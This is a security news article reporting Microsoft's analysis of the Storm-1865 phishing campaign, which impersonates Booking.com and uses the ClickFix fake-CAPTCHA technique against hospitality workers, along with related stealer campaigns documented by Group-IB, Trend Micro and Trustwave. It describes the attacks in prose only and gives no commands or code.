Microsoft has shed light on an ongoing phishing campaign that targeted the hospitality sector by impersonating online travel agency Booking.com using an increasingly popular social engineering technique called ClickFix to deliver credential-stealing malware.
The activity, the tech giant said, started in December 2024 and operates with the end goal of conducting financial fraud and theft. It’s tracking the campaign under the moniker Storm-1865.
“This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency,” Microsoft said in a report shared with The Hacker News.
The ClickFix technique has become widespread in recent months, as it tricks users into executing malware under the guise of fixing a supposed (i.e., non-existent) error by copying, pasting, and launching deceptive instructions that activate the infection process. It was first detected in the wild in October 2023.
The attack sequence starts with Storm-1865 sending a malicious email to a targeted individual about a negative review left by a purported guest on Booking.com, and asking them for their “feedback.” The message also embeds a link, or a PDF attachment containing one that seemingly directs the recipients to the booking site.
However, in reality, clicking on it leads the victim to a fake CAPTCHA verification page that’s overlaid on a “subtly visible background designed to mimic a legitimate Booking.com page.” In doing so, the idea is to lend a false sense of security and increase the likelihood of a successful compromise.
“The fake CAPTCHA is where the webpage employs the ClickFix social engineering technique to download the malicious payload,” Microsoft said. “This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard.”
The command, in a nutshell, uses the legitimate mshta.exe binary to drop the next-stage payload, which comprises various commodity malware families like XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT.
Redmond said it previously observed Storm-1865 targeting buyers using e-commerce platforms with phishing messages leading to fraudulent payment web pages. The incorporation of the ClickFix technique, therefore, illustrates a tactical evolution designed to slip past conventional security measures against phishing and malware.
“The threat actor that Microsoft tracks as Storm-1865 encapsulates a cluster of activity conducting phishing campaigns, leading to payment data theft and fraudulent charges,” it added.
“These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail.”
Storm-1865 represents just one of the many campaigns that have embraced ClickFix as a vector for malware distribution. Such is the effectiveness of this technique that even Russian and Iranian nation-state groups like APT28 and MuddyWater have adopted it to lure their victims.
“Notably, the method capitalizes on human behavior: by presenting a plausible ‘solution’ to a perceived problem, attackers shift the burden of execution onto the user, effectively sidestepping many automated defenses,” Group-IB said in an independent report published today.
One such campaign documented by the Singaporean cybersecurity company involves utilizing ClickFix to drop a downloader named SMOKESABER, which then serves as a conduit for Lumma Stealer. Other campaigns have leveraged malvertising, SEO poisoning, GitHub issues, and spamming forums or social media sites with links to ClickFix pages.
“The ClickFix technique marks an evolution in adversarial social engineering strategies, leveraging user trust and browser functionality for malware deployment,” Group-IB said. “The rapid adoption of this method by both cybercriminals and APT groups underscores its effectiveness and low technical barrier.”
Some of the other ClickFix campaigns that have been documented are listed below –
The diverse infection mechanisms of Lumma Stealer is further exemplified by the discovery of another campaign that uses bogus GitHub repositories featuring artificial intelligence (AI)-content to deliver the stealer via a loader referred to as SmartLoader.
“These malicious repositories are disguised as non-malicious tools, including game cheats, cracked software, and cryptocurrency utilities,” Trend Micro said in an analysis published earlier this week. “The campaign entices victims with promises of free or illicit unauthorized functionality, prompting them to download ZIP files (e.g., Release.zip, Software.zip).”
The operation serves to highlight how threat actors are abusing the trust associated with popular platforms like GitHub for malware propagation.
The findings come as Trustwave detailed an email phishing campaign that makes use of invoice-related decoys to distribute an updated version of another stealer malware called StrelaStealer, which is assessed to be operated by a single threat actor dubbed Hive0145.
“StrelaStealers samples include custom multi-layer obfuscation and code-flow flattening to complicate its analysis,” the company said. “It has been reported that the threat actor potentially developed a specialized crypter called ‘Stellar loader,’ specifically, to be used with the StrelaStealer.”
